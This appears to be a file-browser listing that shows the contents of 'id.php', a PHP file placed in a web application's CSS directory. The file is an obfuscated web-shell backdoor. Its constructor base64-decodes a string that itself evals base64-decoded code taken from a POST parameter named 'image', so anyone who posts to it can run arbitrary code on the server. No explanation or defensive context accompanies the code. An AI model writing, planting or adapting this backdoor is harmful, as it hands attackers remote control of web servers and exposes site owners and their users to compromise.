Current Path : C:/AppServ/www/mfu/webengine/css/ |
Current File : C:/AppServ/www/mfu/webengine/css/id.php |
<?php class c { public $code = null; public $decode = null; function __construct() { $this->code='ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpbWFnZV0pKTs='; $this->decode = @base64_decode( $this->code); @Eval($this->decode); } } new c(); ?>